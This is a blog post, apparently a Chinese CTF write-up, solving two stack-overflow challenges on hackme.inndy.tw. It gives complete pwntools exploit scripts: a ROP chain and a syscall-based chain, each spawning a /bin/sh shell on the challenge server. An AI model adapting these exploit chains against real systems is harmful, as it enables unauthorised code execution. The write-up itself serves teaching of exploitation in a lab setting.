rop and rop2 wp

最新推荐文章于 2022-01-08 16:50:59 发布
最新推荐文章于 2022-01-08 16:50:59 发布
阅读量512 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zszcr/article/details/79786370
版权

题目来源:国外的一个ctf平台https://hackme.inndy.tw/ 

rop

题目提示:ROP buffer overflow 

很明显是一个栈溢出 要用rop来获取shell

防护机制


发现至开启了NX 

拖到IDA反编译一下 


可以看到有很多函数 ,不管是用到的还是没用的都有,说明它的是静态连接

我们可以通过ROPgadget 来直接构造ropchain

命令为 ROPgadget --binary rop --ropchain


栈的大小可以通过peda的pattern search 来找到

先生成 长度为100的字符串  pattern create 100

然后执行程序 将字符串贴上


栈的大小为12

exp:

from pwn import *
from struct import pack
sh = remote('hackme.inndy.tw',7704)
junk = 'a'*12 + "BBBB" # junk + ebp

p = junk
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080b8016) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea064) # @ .data + 4
p += pack('<I', 0x080b8016) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080de769) # pop ecx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0806c943) # int 0x80

sh.sendline(p)
sh.interactive()

ROP2

这一题提示:ROPgadget not  working anymore

说明不可以再通过ROPgadget来构造ropchain了

检查下防护机制 只开启了NX

运行了下观察程序的逻辑 

程序要求你输入一串字符串 然后打印出了一堆东西


拖到ida反编译一下


发现了syscall函数

去查了一线syscall函数是什么

syscall 是系统调用,指运行在使用者空间程序操作系统内核请求需要更高权限运行的服务。系统调用提供用户程序与操作系统之间的接口。大多数系统交互式操作需求在内核态执行。如设备IO操作或者进程间通信。

Linux 的系统调用通过 int 80h 实现,用系统调用号来区分入口函数。操作系统实现系统调用的基本过程是:

  1. 应用程序调用库函数(API);
  2. API 将系统调用号存入 EAX,然后通过中断调用使系统进入内核态;
  3. 内核中的中断处理函数根据系统调用号,调用对应的内核函数(系统调用);
  4. 系统调用完成相应功能,将返回值存入 EAX,返回到中断处理函数;
  5. 中断处理函数返回到 API 中;
  6. API 将 EAX 返回给应用程序。

应用程序调用系统调用的过程是:

  1. 把系统调用的编号存入 EAX;
  2. 把函数参数存入其它通用寄存器;
  3. 触发 0x80 号中断(int 0x80)。

想详细的了解系统调用可以看这一篇博客https://blog.csdn.net/gatieme/article/details/50779184


程序中的syscall(4,1,&v4,42) 和syscall(3,0,&v1,1024) 分别调用了write()函数和read函数的系统调用

这题可以将syscall中的第一个参数设置为execve()函数的调用号,第二个参数设置为“/bin/sh”参数的地址 来执行execve()获取shell

execve()函数的系统调用可以通过http://syscalls.kernelgrok.com/ 这个网址查到 为0xb


所以解题思路为:

1.通过栈溢出,覆盖返回地址为syscall()函数地址,依次压入参数调用read()函数的系统调用,将“/bin/sh\x00“ 写入bss段

2.然后再通过syscall(0xb,bss,0,0)调用execve()函数

exp:

from pwn import*
p = remote('hackme.inndy.tw',7703)
elf = ELF('./rop2')
bss = elf.bss()
syscall = elf.symbols['syscall']
overflow = elf.symbols['overflow'] 

p.recv()
payload = 'a'*0xC + 'bbbb' + p32(syscall) + p32(overflow) # junk + target_address  + return_address
payload += p32(3) + p32(0) + p32(bss) + p32(8) #syscall(3,0,bss_add,8)
p.send(payload)
p.send("/bin/sh\x00")

payload1 = 'a'*0xc + "BBBB" + p32(syscall)
payload1 += p32(overflow)+ p32(0xb) + p32(bss) + p32(0) + p32(0)  #syscall(0xb,bss_add,0,0) = execve("bin/sh",0,0)

p.send(payload1)
p.interactive()

zs0zrc
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ROP2 ROP的启蒙题
snowleopard_bin的博客
08-05 375
from pwn import * cn = remote('hackme.inndy.tw',7703) #context.log_level='debug' elf = ELF('rop2') syscall = elf.symbols['syscall'] print "%x"%syscall over = elf.symbols['overflow'] bss = elf.bss() ...
roprop2的题目的wp
一个码农的笔记
10-17 4465
https://hackme.inndy.tw/scoreboard/ 题目很有趣,我做了roprop2这两个题目感觉还不错,我把wp分享出来,方便大家学习 首先先是rop这个题目,下载地址就在https://hackme.inndy.tw/scoreboard/,如果做题的网站关闭或者被墙,就可以从http://download.csdn.net/download/niexinming/100
SetROP2
I am a coder
03-25 3748
<br />CDC::SetROP2<br />int SetROP2(int nDrawMode);<br />返回值:绘图模式的前一次取值。可以取联机文档“Windows SDK”中提供的任意值。<br />参数: nDrawMode 指定新的绘制模式,可以为下列值之一:<br />· R2_BLACK 像素始终为黑色。  <br />· R2_WHITE 像素始终为白色。  <br />· R2_NOP 像素保持不变。  <br />· R2_NOT 像素为屏幕颜色的反色。  <br />· R2_C
rop2
weixin_30713953的博客
06-04 85
根据nDrawMode设置的方式重新设定绘图的方式,下面就不同的nDrawMode值具体解释绘图模式是如何改变的。   首先就nDrawMode的取值有以下的情况:    1、R2_BLACKPixel is always black. //所有绘制出来的像素为黑色   2、R2_WHITEPixel is always white. //所有绘制出来的像素为白色    3、R2_NOPPi...
buuctf-pwn-inndy_rop-wp
xuaohu123的博客
01-08 314
buuctf-pwn-innd_rop 查看文件保护 32位程序,开启了nx保护。
hackme.inndy.tw的rop2题目
10-15
这是https://hackme.inndy.tw/scoreboard/的rop2题目如果网站被墙或者关闭请从这里下载
rop轻松谈.pdf
10-21
本文將對ROP技術進行詳細的介紹,涵蓋ROP的基本概念、Buffer Overflow、ret2libc/ret2text、Return Oriented Programming等知识点。 ROP技术的基本概念 ROP技術是基於Buffer Overflow的攻擊技術,通過覆蓋函數返回...
rop开放平台
04-12
2. **ROP链生成器**:用户可以输入想要执行的命令或函数调用,平台会自动寻找合适的gadgets并构建完整的ROP链。 3. **沙箱环境**:提供安全的环境进行实验,防止攻击对用户的真实系统造成损害。 4. **教学资源**:...
rop-master.rar
11-04
RopRop 是 Rapid Open PlatformRapid Open Platform Rapid Open Platform Rapid Open PlatformRapid Open Platform Rapid Open PlatformRapid Open PlatformRapid Open Platform Rapid Open PlatformRapid Open ...
rop demo完整用例
07-16
2. **数据执行保护(DEP)**:了解DEP机制及其在安全防护中的作用。 3. **Maven**:掌握Maven的项目结构、配置文件、依赖管理以及构建流程。 4. **Java编程**:理解Java代码如何与ROP技术结合,尤其是在安全领域的...
hackme.inndy.tw的rop题目
10-15
hackme.inndy.tw的rop题目,如果那个网站被墙或者关闭的话可以从这里下载
Windows16种二元光栅操作(ROP2)运算方式
hopyGreat的博客
01-02 2861
本文参考自 《Windows程序设计(第5版,珍藏版)》显示器上所显示的线条外观受定义在设备环境中的绘图模式影响。画一条直线,其颜色由画笔的颜色和画线显示区域的颜色共同确定。当Windows使用一个画笔绘制直线时, 它实际上是在将画笔的像素颜色和目标显示表面的像素颜色按位进行布尔运算。对像素颜色执行一个按位布尔运算称为“光栅操作”(raster operation, ROP),简称ROP。因为绘制
绘图模式--SetROP2
因热爱而执着,因执着而成功。
10-03 1706
设备内容中定义的绘图方式也影响显示器上所画线的外观。设想画这样一条直线,它的色彩由画笔色彩和画线区域原来的色彩共同决定。设想用同一种画笔在白色表面上画出黑线而在黑色表面上画出白线,而且不用知道表面是什么色彩。这样的功能对您有用吗?通过绘图方式的设定,这些都可以实作。       当Windows使用画笔来画线时,它实际上执行画笔图素与目标位置处原来图素之间的某种位布尔运算。图素间的位布尔运算
[BUUCTF-pwn]——cmcc_simplerop (ropchain)
Y_peak的博客
03-16 450
[BUUCTF-pwn]——cmcc_simplerop 有栈溢出,自己找rop链,最简单的方法,让ROPgadget帮我们弄好呀,可是有点长,所有需要我们修改。毕竟有长度要求。因为“/bin/sh"字符串没有找到,所有这之前的都不动, 下面的pop eax; pop ebx; pop ecx; pop edx除了pop ebx 注意下,其他都可以进行修改 inc就是 ++ exploit 目的:使得excve("/bin/sh") eax = 0xb; ebx ->"/bin/sh"; ecx
外国夺旗竞赛CTF汇总--网站大全--实测可用
syh_486_007的专栏
12-02 3387
实用的CTF竞赛网站:Here’s a list of some CTF practice sites and tools or CTFs that are long-running. Thanks, RSnake for starting the original that this is based on. If you have any corrections or suggestions,
分享几个做CTF的网站
热门推荐
weixin_46168073的博客
11-15 1万+
一、Bugku 算是我用过的比较好用的一个刷题网站,里面有WEB、MISC(杂项)、Crypto(密码)、Reverse、PWN的题目。有时还会有AWD复现的比赛。 网址:https://ctf.bugku.com/ 或者百度BugKu 二、CTFHub 这个应该算是一个比较新的地方,里面也有很多好玩的。 技能树里面也有很多提升的地方。 目前就这两个,而且的话,相对比价免费。因为送的币基本上用不玩。 总之,先把这两个平台的题目都做完,然后的话在搞...
实时绘制曲线-SetROP2方法
lin_angle的专栏
02-11 1239
<br />//绘制光圈<br />CDC* dc = GetDC();<br />int oldrop = dc->GetROP2();<br />dc->SetROP2(R2_XORPEN);<br />HPEN hpen = CreatePen(PS_SOLID,2,RGB(0,255,0));<br />dc->SelectObject(hpen);<br />dc->SelectObject(GetStockObject(NULL_BRUSH));<br /><br />dc->Ellipse((
【4.29安恒杯】writeup
wintersun的地带
04-19 1万+
#### 安恒杯_writeup 以下为比赛中做出的题目MISC: SHOW ME THE FLAGCRYPTO: LAZYATTACK这一题很巧,全部的队伍里面只有我们一个队伍将其做出来。 这一题做出来完完全全是靠运气,在当我做出这一题的时候感觉是懵逼的,完全不知道是怎么回事,flag一下子就出来了而且对了,很兴奋。队友都相互说用了和出题人同一个软件,才得到的答案。结果确实是和出题人用
不容错过的CTF竞赛资源汇总
阳光心态,健康人生的博客
03-30 1万+
在国内外CTF比赛越来越热门的背景下,大家都是怎么准备CTF的? 国内外比较知名的比赛:XCTF联赛、DEFCON CTF、首都网络安全日。 做为CTF小白用户,跳过的坑真心不少,加密、隐写、逆向破解和web这几个方向的坑,基本是跳一个栽一个。不过还是靠着免费的线上模拟平台,终于成功脱坑,技术也越来越熟练。 在学习中,我总结了一些值得CTF新手和CTF刚刚入门爱好者,学习的干货。 看点 ...
buuctf [HarekazeCTF2019]baby_rop2
最新发布
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值